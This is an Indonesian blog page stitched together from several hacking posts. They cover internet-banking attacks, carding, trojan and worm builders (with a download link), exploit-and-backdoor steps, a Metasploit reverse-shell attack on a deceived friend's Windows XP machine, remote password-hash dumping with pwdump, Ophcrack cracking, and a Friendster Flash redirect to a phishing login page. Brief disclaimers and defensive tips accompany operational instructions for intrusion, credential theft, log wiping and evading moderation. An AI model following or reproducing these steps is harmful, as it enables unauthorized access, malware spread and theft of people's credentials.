Teknik Cracker

Cara Cracker Membobol Internet Banking

Mei 1, 2010 pada 9:14 am (Cara Cracker Membobol Internet Banking, Uncategorized)
Tags: ,

———————————————————

Author  : AIDIL,S.Kom

———————————————————

Pada tulisan terdahulu, saya memaparkan tentang pembobol ATM. Karena sedang marak pembobolan uang nasabah di bank, kali ini saya akan menjelaskan bagaimana seseorang meng-crack informasi di internet banking sehingga cracker mendapatkan data PIN dan saldo rekening korban. Berikut deskripsinya:

1.      Teknik Session Hijacking

Dengan session hijacking, cracker menempatkan sistem monitoring/spying terhadap pengetikan yang dilakukan pengguna pada PC yang digunakan oleh pengguna (user) untuk mengunjungi situs internet banking. Untuk mengatasi masalah ini pengguna sebaiknya menggunakan komputer yang benar-benar terjamin dan tidak digunakan oleh sembarang orang, misalnya komputer di rumah, kantor, dsb. Perhatikan gambar berikut tentang session hijacking

Tehnik session hijackingTehnik session hijacking

2.       Teknik Packet Sniffing

Pada teknik ini cracker melakukan monitoring atau penangkapan terhadap paket data yang ditransmisikan dari komputer user ke web server internet banking pada jaringan internet. Cracker yang melakukan teknik ini terkenal juga dengan istilah MITM (Man In The Middle). Untuk mengatasi masalah ini perlu dilakukan enkripsi/penyandian paket data pada komputer client sebelum dikirimkan melalui media internet ke web server. Perhatikan gambar berikut tentang packet sniffing.

Tehnik session hijackingTehnik session hijacking

3.      Teknik DNS Spoofing

Pada teknik ini cracker berusaha membuat pengguna mengunjungi situs internet banking yang salah sehingga memberikan informasi rahasia kepada pihak yang tidak berhak. Untuk melakukan tehnik ini cracker umumnya membuat situs internet banking yang mirip namanya dengan nama server ecommerce asli. Misalnya http://www.klikbca.com merupakan situs yang asli, maka hacker akan membuat situs bernama http://www.klik_bca.com, http://www.klikbca.org, http://www.klik-bca.com, http://www.klikbca.co.id. Dengan demikian ketika pengguna membuka alamat yang salah, ia akan tetap menduga ia mengunjungsi situs klikbca yang benar.

Untuk mengatasi masalah tersebut di atas dapat dipecahkan dengan melengkapi Digital Certificates pada situs asli. Dengan demikian meskipun cracker dapat membuat nama yang sama namun tidak bisa melakukan pemalsuan digital certificate. Pengguna atau pengunjung situs dapat mengetahui bahwa situs itu asli atau tidak  dengan melihat ada tidaknya certificate pada situs tersebut menggunakan browser mereka. Disamping itu webserver eCommerce harus dilengkapi dengan firewall yang akan menyaring paket-paket data yang masuk sehingga terhindar dari serangan Denial Of Service (DoS). Perhatikan gambar berikut tentang DNS Spoofing

Tehnik DNS SpoofingTehnik DNS Spoofing

4.      Teknik Website Defacing

Pada teknik ini cracker melakukan serangan pada situs asli misalkan http://www.klikbca.com kemudian mengganti isi halaman pada server tersebut dengan miliknya. Dengan demikian pengunjung akan mengunjungi alamat dan server yang benar namun halaman yang dibuat cracker.

Untuk mengatasi masalah di atas server eCommerce perlu dikonfigurasi dengan baik agar tidak memiliki security hole dan harus dilengkapi firewall yang akan menyaring paket data yang dapat masuk ke situs tersebut. Perhatikan gambar berikut tentang website defacing.

Teknik Website Defacing

Dalam wawancaranya di Metro TV hari Minggu kemarin, pakar keamanan intermet mengatakan bahwa keamanan informasi situs internet banking di Indonesia masih pada tahap prinsip availability. Inilah yang membuat nasabah masih sangat rawan menjadi korban cracker. Sistem keamanan informasi (information security) memiliki empat prinsip yang sangat mendasar, yaitu :

1.      Availability

Menjamin pengguna yang valid selalu bisa mengakses informasi dan sumberdaya miliknya sendiri. Untuk memastikan bahwa orang-orang yang memang berhak tidak ditolak untuk mengakses informasi yang memang menjadi haknya.

2.      Confidentiality

Menjamin informasi yang dikirim tersebut tidak dapat dibuka dan tidak dapat diketahui orang yang tidak berhak. Sehingga upaya orang-orang yang ingin mencuri informasi tersebut akan sia-sia.

3.      Integrity

Menjamin konsistensi dan menjamin data tersebut sesuai dengan aslinya. Sehingga upaya orang-orang yang berusaha merubah data itu akan ketahuan dan percuma.

4.      Legitimate Use

Menjamin kepastian bahwa sumberdaya tidak dapat digunakan oleh orang yang tidak berhak.

===========

Mencuri Data Kartu Kredit Cara Hacker

On Jumat, Maret 19, 2010
 

WASPADALAH! WASPADALAH! 


Artikel ini tidak ditujukan untuk mengajari anda gimana mencuri data kartu kredit, tapi kami ingin memberitahu anda supaya di kemudian hari anda bisa terhindari dari kejahatan pencurian data kartu kredit. Istilah kejahatan kartu kredit yang biasa di istilahkan “carding” sejak adanya internet meningkat ratusan persen. Ironisnya Indonesia masuk dalam jajaran top 10 (sempat di peringkat pertama) sehingga kartu kredit terbitan Bank-Bank Indonesia ditolak ketika belanja online di situs luar negeri.

Para hacker sangat suka sekali kejahatan yang satu ini, kenapa? Karena kalau cuma nge-hack website atau deface (merubah tampilan/link website) merupakan sesuatu yang tidak ada untungnya. Dan hal ini bisa ke deteksi dan pelaku kejahatan bisa ketangkap dengan mudah kalau situs yang dia masuki memiliki TRACKER (program pelacak ip/link) atau LOG FILE (file yang mencatat aktivitas user/ip yang masuk ke website). Kalau carding mereka bisa bebas tanpa jejak dan juga kadang-kadang setelah mendapatkan datanya, mereka sebarkan antar hacker sehingga susah dilacak orang pertama yang mencuri data kartu kredit. 

Ada beberapa cara yang digunakan oleh hacker dalam mencuri kartu kredit, antara lain:
1. Paket sniffer, cara ini adalah cara yang paling cepat untuk mendapatkan data apa saja. Konsep kerjanya mereka cukup memakai program yang dapat melihat atau membuat logging file dari data yang dikirim oleh website e-commerce (penjualan online) yang mereka incar. Pada umumnya mereka mengincar website yang tidak dilengkapi security encryption atau situs yang tidak memiliki security yang bagus.

2. Membuat program spyware, trojan, worm dan sejenisnya yang berfungsi seperti keylogger (keyboard logger, program mencatat aktifitas keyboard) dan program ini disebar lewat E-mail Spamming (taruh file-nya di attachment), mirc (chatting), messenger (yahoo, MSN), atau situs-situs tertentu dengan icon atau iming-iming yang menarik netter untuk mendownload dan membuka file tersebut. Program ini akan mencatat semua aktivitas komputer anda ke dalam sebuah file, dan akan mengirimnya ke email hacker. Kadang-kadang program ini dapat dijalankan langsung kalau anda masuk ke situs yang di buat hacker atau situs porno.

3. Membuat situs phising, yaitu situs sejenis atau kelihatan sama seperti situs aslinya. contoh di Indonesia ketika itu situs klik bca (www.klikbca.com), pernah mengalami hal yang sama. situs tersebut tampilannya sama seperti klikbca tetapi alamatnya dibikin beberapa yang berbeda seperti.

=============

Cara mudah membuat virus trojan – Unanswered


 

Banyak cara sebenarnya untuk membuat sebuah virus. Dari memulai belajar tentang pemrograman untuk mendukung pembuatan virus tersebut, mempelajari hole-hole sebuah operating sistem sampai cara yang terakhir yang paling mudah yaitu menggunakan software yang dirancang khusus untuk membuat virus. 

PINCH Merupakan sebuah software yang diciptakan untuk menciptakan virus trojan. Dengan softraware ini kita bisa membuat virus trojan. Tanpa memerlukan modal pengetahuan bahasa pemrograman, bahkan sampai orang awam pun bisa membuatnya. Hanya dengan setingan beberapa option langsung compile…Jadi deh virus tersbut.

Mudahnya lagi tipe-tipe torjan tersebut bisa kita setting da kita ubah-ubah jenisnya. Hal ini bisa dilakukan untuk menghindar dari tangkapan anti-virus .

==============

CARA MEMBUAT VIRUS WORM DENGAN MUDAH

Hy, teman?? Kamu pasti inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri🙂 Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

aplikasi tersebut dapat di download lewat link ini dalam bentuk .zip :
http://www.4shared.com/file/58988982/d138203b/Vbswg2BFix.html?s=1

=================

Belajar Hack Yuck! (1) – Konsep Dasar Hacking

8 11 2006

Intro

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.

 

 

Bagian 1

*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ‘standar’, hacking sebenarnya tidak harus selalu sesuai dengan ‘standar’ ini.

 

Hacking buat pemula

– by aCh

 

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

 

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

 

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

 

 

Pro dan Kontra Hacking

  Pro Kontra
Etika Hacking Semua informasi adalah free Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security Intrusion adalah ilustrasi kelemahan sistem Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines Hacking hanya pada idle machines idle machines milik siapa ?
science education hanya membobol tapi tidak merusak “hacker wannabe” berpotensi sangat besar untuk merusak

 

 

Okeh, sekarang waktunya melakukan aksi…

 

 

1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

– Secara Aktif : – portscanning

– network mapping

– OS Detection

– application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

 

– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)

– via internet registries (informasi domain, IP Addres)

– Website yang menjadi terget

 

 

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
– compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

– Secara berulang melakukan percobaan otentifikasi.

– Menebak username dan password.

– Cracking password file

 

~ Social Engineering

– Memperdayai user untuk memeberi tahu Username dan password

– Intinya ngibulin user….

 

 

3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

 

 

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!

 

 

 

Referensi :

Hacking and Defense, Jim Geovedi, negative@magnesium.net

Network Defense, Jim Geovedi, negative@magnesium.net

 

«

 

Belajar Hack Yuck! (3) – Hack Windows XP SP2

14 11 2006 *Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

 

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja ).
Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :

 

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

 

 

Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

 

 

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

 

C:\temp\Pwdump –o pass.txt 127.0.0.1

 

Klo berhasil akan tampak pada gambar berikut.

Lalu copy file pass.txt ke komputer kita

 

C:\temp\copy pass.txt z:

 

 

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

 

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

 

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

 

 

Happy Hacking…..

 

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

 

 

Reference :

http://www.metasploit.com

=======================

Hack Windows XP Password dengan Ophcrack

24 01 2007 Intro

Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) :-D . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

 

Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.

Ok.. langsung aja kita praktek, tapi sebelumnya pasang disclaimer dulu ah… biar bisa ‘lepas’ tanggung jawab kalau tutorial ini disalahgunakan oleh pihak lain :-P

Disclaimer:

This document was written in the interest of education and care of awareness for unaware people. The author cannot be held responsible for how the topics discussed in this document are applied.

Lets Begin

Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :

boot.JPG

Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp

dump.JPG

Kemudian tunggu beberapa saat untuk melakukan cracking.

Saya melakukan pengujian menggunakan spesifikasi sebagai berikut : Prosessor AMD +2000 1.6 Ghz, Memori 256 Mb dan dijalankan menggunakan VM-Ware.

Lalu saya menggunakan password yang sangat sederhana, yaitu ‘password123′ dan ‘password’. Hasilnya, Ophcrack mampu menebak kedua password dengan tepat dan hanya membutuhkan waktu 1 Menit!!

Lalu saya coba untuk mengkombinasikan huruf, angka dan simbol dengan memberikan password : ‘p4ssw0rd’ dan ‘p4ssw0rd~!@#’. Hasilnya, Ophcrack mampu menebak ‘p4ssw0rd’ dengan waktu 8 menit dan tidak dapat menemukan ‘p4ssw0rd~!@#’.

hasil.JPG

Selain menggunakan CD, dengan sedikit modifikasi, Ophcrack juga dapat dijalankan melalui USB Flashdisk. Caranya dengan menginstall SLAX ke dalam USB Flashdisk dan menambahkan modul ophcrack di SLAX serta menyalin Rainbow Tables ke dalam USB, maka Ophcrack LiveUSB sudah dapat dijalankan :-D

Selain itu, untuk mempersingkat waktu, kita dapat mengambil file HASH terlebih dahulu yang terletak di /tmp/ophcrack.tmp kemudian baru di crack di tempat lain tanpa perlu menunggu lagi di komputer target. :-D

Saran

Ibarat pisau bermata dua, Ophcrack dapat menjadi sangat berguna ketika ada seseorang yang lupa password Windows dan ingin me-recovery password dengan cepat dan mudah. Namun disisi lain, Ophcrack dapat juga menjadi ‘senjata’ ampuh bagi cracker untuk menjebol Windows dengan cara yang sangat mudah dan cepat. Bahkan kabarnya Ophcrack ini merupakan tools yang paling cepat untuk crack password Windows. Untuk itu ada beberapa hal yang dapat mengurangi resiko agar password komputer kita tidak ‘dibobol’ dengan mudah.

1. Setting password BIOS komputer dan atur urutan boot agar tidak melakukan booting pertama kali dari CD atau USB.

2. Gunakan password yang terdiri dari huruf+angka+simbol agar tidak mudah di crack.

Oph… Crack!! :-D

NB : Cara lain menggunakan ophcrack di Windows dapat dilihat disini

Hack Friendster

12 12 2006 Dalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :

apt-get install libming-util

Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :

getURL("http://www.contoh.com");

misalkan seperti berikut :

getURL("http://chaidir.wordpress.com");

Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.

Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.

Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!

Caranya masukkan kode berikut :


<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0' width='400' height='250'><param name='movie' value='http://numpang.com/out.swf' /><param name='quality' value='high' /></object>

Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.

Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.

‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.

Pesan buat anak2 ABG pecinta Friendster :

Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster ria.. apakah tidak ada aktivitas lain di internet selain ber-Friendsteran?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 – 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso!

Referensi :

http://ezinearticles.com/?Redirect-Your-MySpace-Traffic-With-Flash&id=364276

Sekilas info :

ternyata http://www.friendster.co.nr dah diubah toh… hihihi :-D . Maaf ya kk.. dah publish ‘karya’ kamu :-D

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s